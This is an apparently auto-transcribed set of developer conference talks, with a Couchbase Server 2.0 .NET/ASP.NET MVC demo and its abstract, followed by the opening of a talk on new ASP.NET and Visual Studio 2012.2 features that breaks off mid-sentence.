you do code-first development with a no-SQL database. So I think everyone's familiar with the idea of a task app. You have a task. It has a due date, that sort of thing. So I'm going to start out by creating my model. This is the code-first aspect. If you haven't done quote unquote code-first development with entity framework or something, the basic idea is you define a model class. So I'm going to define a model called task. Can you guys, is the font size big enough? My task will have an ID, a description, we'll say notes, we'll give it a is-complete flag and a due date. So very basic model. Any questions or seems pretty straightforward. So now let's go ahead and how many, I shouldn't make any assumptions, how many people have used, not used MVC before? Excellent. It is interesting. Over the past couple of years, I would say it's increasing by about 25% a year the number of people who have gotten exposed to MVC, which is a good thing. So I'm going to create a new controller. I'm going to use the wizards as I go through this demo just so it speeds things up. So I'm going to create an MVC controller with empty read-write actions. And I'm going to call the controller tasks controller. So all I'm doing is creating a very basic CRUD application for managing tasks at this point. So the index is actually going to be the hardest piece that we do. So I'm going to do that last. It's hardest because we haven't seen how to work with secondary indexes yet. So I'm going to start with the create form. And I'm not going to worry about things like validation or that sort of stuff. We're just going to keep this very simple. So I'm going to use the, has anyone, has everyone used the scaffolding in Visual Studio for MVC? That's all the stuff that I'm doing now is part of the scaffolding feature of MVC where you can basically point it out of model and generate forms and things like that in controllers. So I'm going to create a new view under the tasks folder. And we're going to start with create. And then it's a strongly typed view. And you have to compile your application before it actually shows up in that list. So I'm going to call this view create again, strongly typed. So now my task shows up. So now this is going to give me a nice create. If I pick the check box that says to use the create. So I forgot to set the template to create. So what this did for me at this point, in case you haven't seen this before, if I navigate now to task slash create, I have a very simple create form. I think there's no validation because I haven't put validation attributes on or anything. So it's just a very basic create form that I can work with from now on. Before I do that, what I want to do is jump over to the couch base. I have, if I wave at my laptop, it detects that and starts to do things. So it may move on its own. I did cheat for the Hello World. So this is the couch base console. So it seemed like only a couple people had seen this. One of the big differentiators between the other NoSQL products and couch bases, couch bases has in my not so unbiased opinion the best admin tools. This is what you get when you install a couch base. It's a web-based, fully exposed API. So everything you see, this is a jQuery app. This isn't like a server doing complicated stuff in the back end. This is a full, restful API, interface to a fully restful API. So if you're ever curious to see what is actually happening, you can just use Firebug or whatever tool to go look at the calls that are being made to generate these graphs and things like that. So when you install it, you get some basic information. So I have a couple of buckets active. You can see ops per second. If I actually had ongoing ops per second, I would get to see the moving graph. You can see if you had any servers down in your cluster. You can drill into the node level. So if I had multiple nodes, so if I wanted to create a couch base, a true cluster, a cluster is just a single node or more nodes. If I wanted to have a multi-node cluster, I click on add server. I add the IP address and then I add the cluster username and password. So when you install the first node, you set a cluster account and that cluster auth is used to then basically bring all the other nodes online in the cluster. If I had in that failover case, it would show up as pending rebalance because basically the keys need to be rebalanced. Data buckets, excuse me. So the beer sample bucket, the beer sample is based on the OpenBearDB. This is the couch base version of what was Northwind. So it's not the most up-to-date database. So if you're a beer drinker, you probably won't find the beer you're looking for in there. But there's some interesting data and we wrote a bunch of sample apps around it, which if there's time at the end, I'll show you quickly the.NET one. Views I'm going to cover in a bit. Cross data center replication. This is a nice feature. You can actually pump data bidirectionally out of couch base and bidirectional, cross data center replication is set up by basically setting up two unidirectional cross data center replication. So if you have, I don't know what the coasts are here, but like in America, if you have an east coast and west coast data center, you can send data one way and have it sent the other way. Or you can just use unidirectional and have a single feed into another data center for backup or disaster recovery. The neat thing about it is it's all done with HTTP. So you can, if you wanted to write your own basically HTTP endpoint for the couch base data, across data center replication, you could. And we've done that to work with Elasticsearch. So if you want to pump data into an Elasticsearch cluster and do full tech search on your documents, you can do that. Does anyone use Nancy, the micro framework for ASP.NET? So it's kind of inspired by Ruby's Sinatra. So it's a very simple handler. I wrote on blog.couchbase.com, you can find a little example where I created a Nancy endpoint which listens to the change feed and then just spits out data into an XML file as a dummy example. But if you wanted to move data from couch base into SQL server, that's one way to do it. We're into some other back end processing. The log is what it sounds like. Then you can set some settings like re-adding some sample buckets, whether you want to have compaction and basically cleaning up the disk, auto failover and that sort of thing. What I want to do now is add a data bucket. So for this to-do application, I'm going to create a new bucket. So this is a new database. And when I create this, I'll just give it the name, NDC Oslo. Now again, we're fully compatible with Memcache D. So if you wanted to create a Memcache D bucket, you can, but there's no persistence. If you wanted to use couch base, and we do have lots of clients who use couch base as a caching layer because we have that Memcache D support, so you can actually just drop out your Memcache D cluster and replace it with a couch base cluster and use Memcache D buckets. But again, there's no persistence with those. And the performance really isn't going to be better. So you could just create couch base buckets and set expirations on- there is the ability to add an expiration to a key so you can have it expire and that sort of thing. You can change the port, I'm sorry, you can't change the port with a standard authenticated, if you create an authenticated bucket, it has to be on port 11 to 11. If you want to have an off-less bucket, you can do that just on a different port. So I'm going to leave the password blank for now. I only have a single node cluster so there's no reason to enable replicas. Flush is useful if you want to have a test bucket. So basically you want to just flush all the data out of the bucket. When you enable flush, you basically have a one-click, I can now delete all the data option. So I have that bucket now, you can see it in my bucket list. So now, are there any questions on the UI before I start with the code? So now the first thing I want to do is implement the create method. So I don't need to do anything on the create get, but for the create post, I need to write the insert method basically. So what I'm going to do is start off by creating a static private field of type couch-based client. And I had previously added the couch-based client reference through NuGet to this project because I wasn't sure about the internet access, so that's where that came from in case you're wondering. And what I'm going to do is, in a static constructor, so static constructors, if you're not familiar with them, are guaranteed to execute once before any instance of the classes created. So in the static constructor, I'm going to create an instance of this couch-based client. I also need to set that configuration like I did before, so var config equals newCatchBasedClient configuration. Again, set the URI so it knows where to bootstrap against. And then the bucket name. What I call ndc.oslue. And then I pass that config to the client. So now I have a static field that I can now use across all my methods here. And that was, again, just what we saw with the Hello World stuff. So now in create, what I'm going to do is, let's see. I'm going to change this. Instead of taking a forms collection, I'm just going to have it auto-bind to the task using the kind of bi-directional data binding that comes with MVC out of the box. So now that I have a task, actually, first site, so we're a key value store, right? So I need to consider what the key is going to be. Now a lot of times, predictable keys are useful because you can do ordering on keys and things like that with views that we'll see in just a few minutes. But the important thing is that you pick a key that makes sense for your scenario. Now there's really not value in having a key. There's no auto key, first of all. So there's no sort of, I do an insert and I don't have a key, so it automatically assigns one. You have to pick a key. And so generally speaking, if I were doing a to-do app like the one I'm demoing now, I would just use a GUID or some unique identifier. There's not really any value in having a descriptive key for a task. If someone has a better reason to do that, I'm open to that. But I think the best way to do this is just GUID.newGUID.2string. All keys in catchbase are strings, UTF-8 strings. Oops, not result key. So now I'm going to call the store method, but I'm going to call a different store method. So one of the interesting legacy items I had to deal with when I first took over the catchbase client was that it was, again, it was a caching library under the covers. So the core of the library was a caching library. And in a caching library, arguably you don't want exceptions thrown if something is a cache miss or something is a cache fail, cache write fail. You either got it out of cache or you didn't and your application responds appropriately. So what was happening in the internals of the client is every single exception was being swallowed and booleans were being bubbled up to the top. So if you called store and it failed, you got a false. Now, if you're storing a transactional financial data or something, you probably don't want false as the reason why something failed. So there's this sort of parallel API. So every store get remove method has an associated execute dot dot dot method. So execute store returns more detail than store. So store returns a boolean. Execute store returns an operation result, which I'll show you in just a second what that contains. So we'll do store mode. We're doing a create. So I'm going to do store mode.add. The key again is that GUID. And the thing we're going to save is the task. So then that result object. So you can do things like check the success of the result. So a common pattern, if it's successful, or if it's not successful, I should say, you can check things like the message, the status code, or the exception. So if there was an exception way down in the socket layer, it basically gets wrapped up and passed up through this exception object. So there's no exception that's thrown, but you can check to see if, excuse me, if exception is not null, then throw that exception. So I won't go through that exercise of all that detail, but just so you know there is a bunch of detail about what went wrong or what didn't go wrong inside of that result. So let me get claim some space back here. So now on the next line, I'm just going to redirect to the details. So we'll kind of work our way. We'll create it and we'll show the results in the details. Oops. So redirect to action, details. So I want to redirect with the ID set to the value of the key. Oops. Return. So there are a couple of issues I have to fix that I just know from doing this a bunch of times. You have to save serializable objects through the client. So if you're saving a class, it has to be serializable because it gets serialized and saved. And the other thing is because we're dealing with string IDs, with an MVC template you get int IDs so you just have to change so on edit and on details, these int IDs have to be string IDs or the routes don't match. And since we're going to details, let me just find that. Okay. So now let me compile that. So now, oops, where did my, this should still be good. So I'm going to just create a very simple task here. And there's my gesture thing popping up because it sees me waving or something. It's not complete. We'll give it a due date of 6.14, 2013. Apologies. Okay. So this I expected, right? So I haven't created the details for me yet. So no exception was thrown. Here's my GUID. If I go, well, I'm going to go through details first and then I'll show you what's actually in the database. There are any questions on create so far? Pretty straightforward. I have a key. I have an object that's serializable. I save it. There's not much more to it than that. Now in the details, I'm just going to get by key. So the key is passed, oops, the key was passed here in the query string. So I have the key available to me. And that's coming in through the route as this string ID. So var result equals client.excuteget. And I can use the generic execute get, which will automatically cast it to a task on the way out. And then the key is the ID. And then I just pass that. So the execute get method returns an I get operation result, which has a value property, which is the thing I saved. It also has the exception property, the success property and all those things. So that just wraps all that stuff. The get method returns either null or the object with no detail about what went wrong. So now I'm going to create the details view. I'm going to name it details, scaffolding template of details. So now if I compile and refresh this YSOD, then I should get, so now I have the description showing up. So pretty straightforward getting set. It's really just what we've seen so far in our console app. But what I want to show you now is what's actually in the database. So you can see in NDC Oslo we have one up per second. So we're doing pretty well there. If I click on documents, one you can see over here that I have an item count of one. And if I click in here, you can see here's that document. Here's the key. So this is a little strange though. I've said before couch base is a document oriented database. That doesn't really look like a document. Anyone have an idea of what that is? Base 64 encoded version of the binary object. Now I didn't store JSON. There's a big difference between couch base and MongoDB. MongoDB forces everything into Bson, binary JSON. Couch base does not. Couch base stores binary objects. It stores JSON as just a special recognition object you can think of it as. So on the server, if you store valid JSON, the server can do stuff to that JSON document. The client has to make a decision as to whether it's going to pass JSON or not. And to make that easier, what you can do is use some extension methods. So we've thought a lot about whether we should force people to store JSON. We have a legacy of a lot of binary data being stored. So we couldn't just release 2.0 and say, oh, all that data that you stored binary, now it has to be JSON. So we have, plus some people don't want to store JSON. They want to store just objects in their binary form and retrieve them quickly. People are storing images, people are storing all sorts of different things in couch base clusters. So there are lots of use cases for not storing binary objects. JSON is very expensive. We heard from a former CTO of Zynga that they were spending 30% of their CPU cycles just doing JSON serialization and deserialization. That's not insignificant, obviously. I do have some extension methods, though. If you want to always, under couch base.extensions, you can basically take any of the execute methods and tack the word JSON to the end of it. So if I say execute get JSON or execute store JSON, if I compile that and go back to my form, we can see something else that happens, create a task 2. So everything worked as it did before. But now if I go back to my documents, you'll see that I have JSON stored here. So I have a useful thing as far as the server is concerned. I have a JSON document against which I can write a secondary index. So I'm just going to store a couple of these tasks quickly and just change some dates here. And we'll create a task 4. We'll call this. OK. So now over here, I've just basically created some more data to demonstrate the list, which is the next thing we'll do. Before I jump into the list, which is going to switch to secondary indexing, does anyone have any questions? What happens if you go back to the document with the JSON? It's still non-JSON in there. Yeah, but when you're in your report, we're trying to do the... Oh, yeah. That'll break because, yeah. If I took this... I apologize that I didn't bring music. So if I tried to drop this in, I'll get a deserialization problem. Well, the model doesn't have an ID, so the form is actually breaking, but it won't deserialize because it's not a string. Yeah, backwards compatibility. And there are a bunch of challenges with backwards compatibility because you can store a document that doesn't deserialize properly into your class. You can have binary data that's not going to store properly. There are solutions for all that stuff, whether it's versioning your documents or just having... You can create something called a custom transcoder. It's pluggable, so you can basically tell Couchface every time you deserialize something, if it's of some particular format, then deserialize it into binary and then JSON. You can look up transcoders and see some videos that we had done on how to do some of that sort of special mapping. My question would be then, so everyone knows how to work with key value stores. How would you get a list of all the keys for a particular... How would you get a list of all the tasks with a key value store? Can anyone imagine how you might have done this? If all you had was this key value API, how would you go find all the keys? Kind of a trick question. Yeah, there's definitely... And I'll show you how to do it without... This is not using the key value API to do that. So with Couchface 1.8, which was a pure key value store, the sort of approach that people took was to store keys in another key. So if you wanted to say all of my tasks are... When I create a task, also insert the key into the tasks list. So you're basically storing references and other keys, pulling them all back. There were some other... Like if you had sequential keys, you could do basically a bunch of gets until one failed by incrementing up one. And then you kind of knew the one that failed, that's the top one, and now grab them all. None of it's pretty. Yeah, everyone kind of realizes that. So secondary indexing really is much prettier, it's much nicer. So let me jump right into that. So the way secondary indexing is done, it's something called a view. Has anyone heard the term map reduce before? So map reduce, if you've used link, you've probably had some sort of map reduce exposure. Think of a very basic idea, you have some collection of things, in this case all of the documents. You have a map function. The map function is going to be applied over a big four each loop, over each of your documents, and the input to the map function is the current document, the output is a key value pair. The key is something you want to search on, or something you want to create an index on. So it's basically just transforming a set of data into a projection, which is a key value pair. And you can do that with a dot where dot select in link. So if you want to think of a link analogy, the map function is kind of like the dot where, and the application of the dot select to shape it into a key value pair. Let me show you in JavaScript what that means though. So we have this idea of development versus production views. So development views are done with basically taking a small set of your production data. Let's say you want to create an index on a million records. You don't want to start with all one million records. You want to start with a finite subset of that. So development views are deterministic. They create a small subset. They basically grab a small set of your data and mark it as usable in a development view. So it's a useful way not to break things. Design documents are namespaces for your index definitions. So I'm creating a design document called tasks, in this case. The dev underscore is what makes it that deterministic dev database. I'm sorry, design document. And the view is just going to be all. So I want to get all tasks. So once I create that, I click in and I have this editor where I have a map function which is just a JavaScript function that by default creates an index on the ID. Now, the only reason you would ever create an index on the ID, so the ID is the key. So one of the confusing things to kind of get your head around is in the context of key value crud operations, the key is the key in the key value operation. In the context of a view, the key is the meta.id because views actually create a new key value pair, which is the index. So when I'm talking about keys in terms of views, I'm talking about the thing I'm indexing. So I'm creating an index on a property that property is called a key. So if I run this, you see I just get all documents along with their, the index created on their ID. Now this is the primary key. So this is just like creating a secondary index on a primary index. You wouldn't do that, obviously. Unless you want to do a range query on your primary key. You can't do range queries on keys without using, without creating an index on them. You can't say give me all the keys that start with A and go to Z if you don't have an index on that secondary index. Now, but what I want is really just null. So I want all tasks. So I don't care about the key. I just want to, I want to create an index that will just return all of the data for a set of tasks. So let me show you what, how this actually works by showing you the JSON that comes back to the SDK. When you create an index, you create a triplet of rows. You create a set of rows where each row is a triplet. And the triplet consists of the original ID. So the key from the key value, insert, the key, so the thing you're indexing. So if I had a first name or last name, that would show up in the key. And the value is potentially a projection over which I'm going to do aggregation, which I probably don't have time to get into today. But if I were doing like a count of tags, I would project something into that, or some of tags, I may, or some of karma points, I may project that into a value and then do aggregation on it. But the important thing is that with every row in an index, and this is just a standard B plus tree database index, with every row I have the ID of the original document. So what I do with that ID generally is go back to the original document in memory and pull it out, because Catchbase has persistence. So views are basically indexes that are stored on disk, right off of disk. But you go back to the memcached API, because your document is 99% likely to be in memory. So all of those documents are resident in memory if you have enough memory. So any most recently used document will be there. So it's kind of a different access pattern than your typical database where you wouldn't generally create an index to get the primary key to go back to the original row. But that's what you do in Catchbase, because you create an index to get the ID to go back to memory. So it's just a different sort of workflow. But that's abstracted from you and the client. I'll show you that now. So let me do the all query here, and then I'm going to change it to something that will hopefully illustrate what that key and the key value is a little more easily. So now if I go back to the client, like, what? That's going to be an issue I'll show you in just a second. That was a good catch. So the index method, where is it? So what I want to do is call the client's getView method. There's a generic getView which will convert your documents into an instance of t. So my design document was named tasks, and my view name was all. And there's a third argument that says go pull it out of memory instead of trying to deserialize that value. And then I'm going to pass that view to the index view. Again, we have a name collision with view and view here. So I'm going to create an MVC view called index with a list scaffolding. So one more quick thing I have to do over here is I have to promote this from production, from dev to production. So when I publish, now you can see I have a production view. So basically I just took the dev underscore off the name so it will go against my entire dataset. So now if I go back to list, oops. So this is part of the problem that a couple of people have mentioned. So I have this binary thing sitting in there. I can't convert that. My view just emitted everything. There's no way for me to know that a document is a task. We don't have a concept of a collection or some kind of container for documents. In Couchface there's a bucket, and the bucket just contains documents. So the convention is to include a type on your documents. So what I usually do is define a base class that forces you to implement an abstract type. So we'll just return task. So this demonstrates the schema-less idea. So now I can just go create new documents with a new schema, quote unquote, because each document has an implicit schema. But if I go back, let me create just a couple of quick documents here. Let me make this. Now if I go back to my view, now I can check that I just pull up a random somewhere in here. So now you can see, does everyone see this type equals task? Now in my map function I can emit only tasks. So anything you can do in JavaScript, you can do, oops, you can't edit in production. You have to go to Dev to edit. Anything you can do in JavaScript, you could theoretically embed jQuery in here. I've looked at, I've basically taken a base64 decoder, put it in here, and pulled out like original strings that have been base64 encoded as a demo. I would never recommend doing that. So now I can check if doc.type equals task, then emit it. So if I save that and I show the results, now you see that I'm only getting the two records that I created. So I've given taxonomy to my documents, even though they don't have it. So I'm republishing to production. So now when I go back to list, hopefully everything should work. Now you see that I have my documents. But I want to show one last thing, then I'll take questions. So if I create a new document, and I give it, so if we look back at my list, you see I have 114, 314, but let's say I do 12, 2013, 2012. So I'm intentionally creating these in the past. So a couple things to demonstrate. These are eventually consistent. So basically when you create the view, you create an index on all the documents that exist. There are different tuning settings to say that you can force a view to be not eventually consistent. I don't have time to demo that, but it's basically you can set a flag that says, on a right, make sure it goes to disk, on the view, make sure that you update the index, which is incremental. It's not going to update all of your documents. It's just anything that's changed. And that gives you a fully consistent read. So when I refresh, it shows up. So it just took a second for the indexer to kick off and update that. So basically requesting a view triggers the next index of your view. But you can tell the view index first and then give me a result. But notice that these are not quite in order. 12, 12, 2012 should be the first task in my list. So the way I solve that problem, I can create an index on the date. So if I go back here, oops, we're going to add a new view. And we're going to call this by date. And this is going to be very similar to my all. So I'm just going to copy this. So let me make that a little bigger. So now in addition to checking that the type is a task, I want to make sure that because we're schemalists, I want to have some protection on my index creation. I want to make sure that the doc has a due date. Because I don't want to index a document by due date if it doesn't have a due date. And I can just use JavaScript's implicit null check there. So now I'm emitting the due date. So you can think of all these map functions if you want to think of a SQL analogy, create index. All this is doing is creating indexes on properties inside of documents. So if I show the results, you can see that now I'm ordering correctly by date time. Let me publish this to production. Even if I come back here and change my method to by date. So now when I refresh this, we should see this order by date. So now 1212, 2012 comes first, which coincidentally is the date that catchbase 2 was launched. One other thing I'll mention that's worth knowing about is out on github.com. There's a much more complete example of using Couchbase with MVC. And this is, it runs against the beer sample database. And I've extensively commented this thing. I wrote like a 40 page tutorial on it. If you picked up the NDC developer book, I wrote an article on basically here's the beer sample database, here's the view that gets you data out of it. So that's in there. But this says everything from basic cred forms that we just looked at. If you wanted to see, it doesn't look like we have any. If you wanted to see how to do aggregation, this is all in there. If you wanted to see, again, this is github.com slash couchbase labs. And there's also geospatial stuff. So if you wanted to see how to do geospatial indexing, this app is kind of goes through some best practices too. So has anyone, is anyone familiar with the repository pattern? So I implemented a repository of T. I'm at zero here. So there's a repository of T and it's fully commented. You can see how to create subclasses out of a base repository class, which will then give you access to all of your handling of errors and how to reuse a lot of this code. There's also one last thing I'll mention. That JavaScript stuff that I was showing you, you can actually not do that. And instead use a framework I wrote called couchbase model views, which you decorate your plain old C sharp objects with attributes and it will auto generate the views for you. So if you wanted to create that all view, a by name query or that sort of stuff, it will just automatically generate that. So I know that was a lot of information, but are there any questions? In this framework? Oh, sure. So the sorting, it's ascending by default. You can set descending to false. There's a parameter. So all the views, the API has things like descending. You can set stale as the parameter to turn off. You can do an exact query by passing in a key. So if you wanted to find the user with the last name of X. All in the query. Yep. Question? So multiple buckets, I would generally say there are resources associated with each bucket and there are limitations where you can't cross buckets to get data. So if you have a document in one and you want to somehow reference that document, you can't do joins or anything like that in no SQL database, but you can, with the same client, you can get to multiple documents within a bucket. So there's client affinity to a bucket. So if you create an instance of, like if you have five buckets, you're one going to create a lot of client resources. So it's per node per bucket, 10 connections per server. So that adds up quickly. But more importantly, there are things like indexers. So the thing that actually increments all those design documents or implement, that thing that actually indexes all those documents is happening per bucket. So a lot of those resources are expensive. So the general rule of thumb I always follow is if I would create a database for this in SQL server, I would create a bucket for it in CouchBase. With that type property. So again, it's that convention of including a type property or a doc type property or something. And that's kind of inherited from CouchDB where the same sort of general collection of just one thing existed. Yeah, you can, so there's some limits. When you set the bucket memory size, it has to be equal, there has to be basically the same amount of RAM on each node in the cluster because the sharding is distributed equally. So you can't have one bucket, one node can't have, so if you set it to three gigs, for example, all of your servers have to have three gigs available. So if you had like a 96 gig large instance on Amazon and you wanted to have that coupled with a small instance with 24 gigs or something, that wouldn't work. But you can upgrade all of the nodes. So you can have nested objects. There's no referential integrity. So generally the pattern is to store the ID of another document as a property of another document. You need to combine them manually. And in that bear sample application I showed you, I do walk through how you do master detail. So it's a little tricky. And I actually walked through that in the developer article that I wrote. Like what? So the comment was about what it looks like Lotus Notes. Damian Katz, who is the CTO of Couchbase and the creator of CouchDB, worked at Lotus Notes. So no coincidence, I'm sure. Question? No, so you specified, the question is, you know, when you handshake to that first node, generally you want to specify more than one node. So if that node isn't available, you can get to the next one. But once it connects to one node, it gets a list of all of the URIs. So if a node goes down, it knows how to get to the next one. So you can get to the next one. In the config is generally the preferred approach because it maintains an internal list of nodes to connect to. Question? Yes, so for large tables that's being queried in lots of different ways, do you think there's a way to get to the next one? You know, I think one of the, so NoSQL actually refers to not only SQL, so I think anyone at Couchbase or any NoSQL company would probably suggest that it's a complementary technology. You know, SQL will always have a place for like data warehousing for highly transactional systems. You know, you can do, you can mimic sort of after the fact transactional systems, like do verifications after things go wrong, you know, after things are inserted and see if they went wrong. But I definitely think there's room for both. You know, I don't think that anyone's going to stop using SQL because of Couchbase, but they may stop using some of their SQL for Couchbase. So is performance one of the issues? Performance is, yeah, performance is definitely a big issue. So we, Couchbase is probably, I mean, this is obviously a somewhat biased opinion, but is generally considered probably the fastest NoSQL database out there. You know, we, so a good example of what we can achieve, LinkedIn, I'm sure most people know of, they have a four node cluster, they're doing 400,000 ops per second. Cisco, who has ridiculously fast hardware, has a five node cluster doing one and a half million operations per second. So you can't get that out of SQL server, you know, you can't get that, you could, it would just cost you a fortune. So it, you know, for people who need to scale massively and easily and quickly, you know, one of our biggest success stories is that you guys have drawn something, did everyone, does everyone remember that game, the little Pictionary app? It went from like 3 million to 100 million users in a matter of weeks and they scaled out on us. So there's, scale is definitely our best story. You know, we have, you know, I think we have just, we've spent a lot of time in making sure that this thing will grow from one node to 100 nodes and have no downtime because you can, you add nodes, take nodes offline without your application having to go offline. Question? Yes. The replication story, you talked about how you could replicate the non-seed, but there was a talk about how you could replicate the non-seed, but there was a talk about how you could replicate the non-seed to calculate the stator or EPL. Oh yeah, so cross-data center replication is cluster to cluster. That is the standard, but you can, because it's an open interface, you can actually implement other endpoints. So, but the replication is actually just, I have three nodes in a cluster. I specify that two of them are replicas and one of them is a primary. So it just, it will replicate automatically for you. You could, yes. Yeah, so if you wanted to take, so a common use case is in the advertising industry, the online advertising industry, where people, they pull data into CouchBase, pump it out into Hadoop, do some analytics and pump it back into CouchBase. Any other questions? Thank you.
|
Couchbase Server 2.0 is anopensource, distributedNoSQL database. It is a document-oriented data store with a key/value API.Couchbase features a map/reduceengine that allows for complex document indexing and querying.This talk will introduce development with Couchbase Serverusingthe.NET Client Library. After a brief overview of serverdeployment andarchitecture, a detailed look at the key/value and document APIs will be covered. The discussion will conclude with a demonstration of using the code-first approach to building an ASP.NET MVC application withCouchbase.
|
10.5446/51447 (DOI)
|
Okay, all ready? Good morning. People have warned me about this stage and I'm feeling it. It's all wobbly up here. So if I just disappear, you'll know what happened. So we are going to be talking about BleedingEdgeASP.net. This is me. We have a podcast booth here at NDC and we're having a lot of fun with that. So let's dig right in. I'm going to be talking about just release stuff and stuff that's coming out soon. And when we've been talking about, hey, we've got another release, Visual Studio 2013, more ASP.net stuff, some people are kind of freaking out a little bit because they're like, you know, I'm barely keeping up with Visual Studio 2012, right? And they feel like, you know, they are getting eaten alive and they're just kind of worried. They feel like they're being chased and they just can't keep up, right? But what I want you to feel like instead is, you know how Google Chrome just kind of automatically updates and you get new goodness all the time? It's like, you know, you're just good things just keep coming and you're just enjoying yourself, right? So I want to, instead I want you to feel like with Visual Studio, you know, more frequent updates, with more frequent ASP.net updates that you're not getting in trouble, you're just gaining new powers. So, you know, you're just kind of leveling up and, you know, you can do more than you've been able to do before. All right, that's about all my funny pictures for today. I can't keep this rate up all day. So here's what I'm going to be talking about. What's new? BleedingEdge ASP.net. For me, that means what came out after ASP.net and Visual Studio, okay, so Visual Studio 2012 with ASP.net 4.5, MVC4, WebAPI1, so, you know, the big thing that came out last August. So we're going to start with that and then we're going to talk about what's coming out next. All right, so here's how, there's release notes that are up on the site for, you know, what came out in 2012.2. So let me back up for a second. How many people here are running Visual Studio 2012? Excellent. How many of you people have upgraded to Update 2? Okay, that's pretty good. It makes it easier when it keeps popping up with a little balloon, right? So if you haven't updated to that, I recommend you do. So if you've got that installed, you've got ASP.net 2012.2. So the idea is, you know, we used to have, like, Visual Studio 2005 and that had ASP.net 2.0 and then you wait a few years and giant books would get written about it and then Visual Studio 2008 came out and then you had ASP.net 3.5 and then you wait a few more years and a few more years. What they're doing now is, you know, big releases and then a lot of refresh updates on top of that. The nice thing with that is when you get a big release, a lot of it is just stuff that has been coming out over time anyways. So what was in the 2012.2 release that came out in February didn't change the ASP.net core. So that's really important to understand. If you, if I've got that installed, if I've got Visual Studio 2012.2 installed, I build an ASP.net site, I take advantage of all the cool new features, I zip up the project and I email it to you and you haven't got that installed, it'll all still work and you can deploy it to your server and that'll all still work, okay? So none of the core stuff changed. The things that did change are templates and tooling. So templates meaning when you do File New Project, what you see, what your project is set up with. And that mostly includes NuGet packages. So a lot of, you'll see when you do File New Project, you watch the status bar and you see all the NuGet packages being installed. That's, that's kind of how we're, it used to be that a project template was a very specialized thing and now project templates are really kind of packaging up a lot of NuGet packages. So, so we've got new templates. We've got, you know, WebForms, SignalR, which graduated from an open source project to a, you know, real shipping thing from Microsoft. WebAPI, a lot of updates on that. So we saw a lot of people starting to use WebAPI when it was officially released last August and they wanted a lot of features and so they've been putting a lot of work into WebAPI. And then with MVC, we got two new kinds of templates. We got single page application templates like Ember and Knockout and all that kind of stuff. So it makes it easier to build single page apps. And then we got Facebook template also. So then to keep up with that, we've got tooling that works with all those features, right? And also just some cool new things. Again, like I was saying, Chrome updates every 15 minutes and, you know, everybody's, there's new changes all the time, right? And people are coming up with new languages and new libraries and so we've been updating the tooling and visual studio so that it's easier for you to take advantage of those things. Okay. I am going to point out something which is not going to sound super insanely cool, but it actually is. How many people here are doing web forms development? Okay, double that number because I know there's a bunch of people that don't put their hands up. If you're doing web forms development, you've got to pay attention to this. I talk to people all the time. I keep bugging them and they say, yeah, yeah, actually I mostly do web forms. And then I'll ask them if they know about these features and they don't. And so you're really missing out if you're not taking advantage. So we've got, this is a little hard to see. The important thing, I guess I could zoom, but I'll just tell you. And trust me. So what we did, the old way you used to do binding was you had data controls hooked up to some sort of data source. It might have been a control or something you set in code behind. And it was, it was kind of, you know, just wired up in a weird way and then inside of your control, you would set a bunch of things in quotes and they were just strings. So you'd say, fill in this field with this property and it was just a string. And if you misspell it, you don't know until you run the page, right? So what we've done now is data controls have a model type. So the model type is defined for that control and once you do that, then you can just say item dot. So you can data bind to item dot first name. That is strongly typed. So there's all kinds of great benefits that come out of that. One is if you type it wrong, you're going to know right away. You get the red squiggly. I mean, it's not compiling, right? Secondly, you get intelligence. So, you know, if it's a currency type or if it's a date time, you can say, you know, item dot date dot and then you can fill it. You can use the properties on that very easily. There's probably a bunch of other things, but those are enough, right? Those are good reasons to jump in. Now that we've got the control strongly typed, the control knows what it is binding to. We can do some other cool stuff. So we've got on the control. So this is repeater and instead of getting its data by, you know, on item data bound or any kind of other stuff, setting a data source property, we can say select method equals and we give it the name of a method. And the method just needs to return Iquariable or Ienumerable, okay? So we say repeater, get your data from get customers. And then get customers is this method down at the bottom. And what you'll notice about that, this is Iquariable and it's just returning some data. It could be pulling it from a service, from entity framework, from N-hybernate, whatever, okay? The important thing is this bottom block of blurry text that you can't read, that says nothing about web forms. There's nothing in there. If you looked at it, you'd have no idea it's web forms. It means the data, there's separation of concerns. You can share the data, access methods and services, et cetera. So that is cool. Finally, oh, and then here you can also bind in those access methods, you can bind to control properties. Yes? Yeah? Yeah, so good question. So they work together. So here up at the top we've got repeater and then we've got item type equals blah, blah, blah, blah, blah, something.customer. And then we have select method equals get customers. Exactly. Yeah. So those two obviously need to match up, right? Okay. Then finally, when you're inserting data, since it's strongly typed, you've got a model, we're able to do the exact same type of data updates that you do in MVC. That includes try update model, all the validation and all that stuff. So that means you don't have to say customer.firstname equals textbox, firstname.text, blah, blah, blah, and you don't have to do null checking and validation and all that. You can use all the same MVC update binding features. All right? I have to point that out because nobody does it, nobody knows about it and it's incredibly cool. One other cool thing that they bolted on top of that is now that everything's kind of strongly typed and everything works pretty close to how things do in MVC, we've got a friendly URL package that's included. So File New Project and web forms, if you've got the newest update and going forward, it's going to have this friendly URL package. That means if you've got an ASPX page, you can just browse to slash album, slash edit, slash one. You can have those same kind of URLs that you would have in, you know, an MVC app. So it's easy to just think, okay, that's neat, this is doing URL rewriting. It's actually doing a lot more. So I'm going to fall off this stage before this is over, so we'll keep watching. Okay, so this one here, I've got album edit one. This is actually binding on that. And so the method here, remember we're using a get method to populate that data. It's actually able to pass that value through from the URL down into the control itself and it pipes that along for you. Okay? So super easy to hook things up. When I do longer demos with this, I show it off and the coolest thing is there's almost no code. Everything just kind of maps together really cleanly. That's all, that's about all I'm talking about for web forms today, but I hope you paid attention for that part if you're using it. What we did with MVC was really, so, you know, there were a lot of like new core features in MVC4. And then in the 2012.2 release, what we did was build a bunch of templates that take advantage of those core features. And the way we did that was we set up, we changed the templating system. If you've ever tried to build a new file, a new project template, it's really hard. And it's actually still kind of hard, but it's a little easier. We went through and changed it so it uses V6 packaging. It's a visual studio installer, or a visual studio, yeah, it's a visual studio installer. But it's basically just a zip file with a manifest. Okay? So a bunch of people have gone out and created other packages, community packages. So now it's very easy to set up, you know, use EmberJS, Angular, Brieze, knockout, et cetera. Okay? Anyone using those? A few people? Okay, cool. All right. But you want new things, so let's talk about it. And let me check my time. 1asp.net, I'm supposed to be there at around, I'm like right on the money. Okay, you've all heard people talking about 1asp.net kind of for a while, right? Scott Hanselman's been doing this Lego blocks. You've seen this kind of diagram for a while. It takes a lot of work. So the idea is when you do File New Project, you're faced with a choice. You have to say, am I going to pick an MVC project? Am I going to pick web forms? I mean, I pick web API. You have to make that choice. Well, you can pick MVC because you can always just drop web forms into an MVC project pretty easily. But if you're mostly doing web forms, that's kind of a weird choice. And if 